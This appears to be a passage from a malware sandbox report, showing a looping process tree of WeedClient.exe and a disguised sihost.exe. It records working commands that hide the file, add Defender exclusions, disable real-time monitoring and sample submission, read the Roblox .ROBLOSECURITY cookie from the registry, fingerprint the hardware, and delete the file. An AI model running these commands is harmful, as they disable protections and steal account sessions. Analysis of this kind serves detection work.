        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        41⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:3984
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:5736
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        Views/modifies file attributes
        
        PID:5408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        41⤵
        
        PID:5292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:2508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        41⤵
        
        PID:3056
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        41⤵
        
        PID:4920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        41⤵
        
        PID:5892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        41⤵
        
        PID:4424
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        41⤵
        
        PID:5788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        41⤵
        Detects videocard installed
        
        PID:2600
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        41⤵
        
        PID:1108
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        42⤵
        Runs ping.exe
        
        PID:512
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:3436
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:1696
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:3704
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        Views/modifies file attributes
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        38⤵
        
        PID:3092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:5864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        38⤵
        
        PID:5628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        38⤵
        
        PID:60
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        38⤵
        
        PID:2364
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        38⤵
        
        PID:792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        38⤵
        
        PID:4900
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        38⤵
        Detects videocard installed
        
        PID:5168
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        38⤵
        
        PID:1500
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        39⤵
        Runs ping.exe
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        35⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:5724
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:4532
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        Views/modifies file attributes
        
        PID:4556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        35⤵
        
        PID:5936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:2476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        35⤵
        
        PID:2180
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        35⤵
        
        PID:2184
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        35⤵
        
        PID:5952
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:3108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        35⤵
        
        PID:868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        35⤵
        
        PID:872
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        35⤵
        Detects videocard installed
        
        PID:1984
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        35⤵
        
        PID:1920
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        36⤵
        Runs ping.exe
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:5712
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:5468
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:3256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:3692
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        Views/modifies file attributes
        
        PID:6000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:4548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        
        PID:3700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:6048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:5672
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:5564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:4756
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:60
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:2072
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:2920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        
        PID:3588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:1604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:1852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:3168
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        32⤵
        
        PID:1704
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:5672
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        Runs ping.exe
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:5180
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:3752
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:5256
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:6128
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:4280
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:1988
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        Views/modifies file attributes
        
        PID:5784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:6064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        
        PID:932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:64
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:5808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:1060
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:5320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:4476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        
        PID:2468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:5148
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        28⤵
        
        PID:3416
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        Runs ping.exe
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:3852
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:6092
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        Views/modifies file attributes
        
        PID:2284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        
        PID:1852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:5284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:4248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:2680
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:4196
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:4760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:6012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:5260
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        25⤵
        
        PID:5004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        
        PID:5440
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        26⤵
        Runs ping.exe
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:792
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:2920
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:1068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:4336
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        Views/modifies file attributes
        
        PID:5984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        
        PID:4996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:4624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        
        PID:4728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:3276
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:1988
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:5832
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:5256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        
        PID:312
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:5976
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        22⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        20⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        20⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:5396
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:5664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:5816
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        Views/modifies file attributes
        
        PID:5260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4088
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4088 -s 388
        20⤵
        
        PID:5912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        
        PID:6104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:1812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:5176
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:2672
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:5992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        
        PID:2584
        
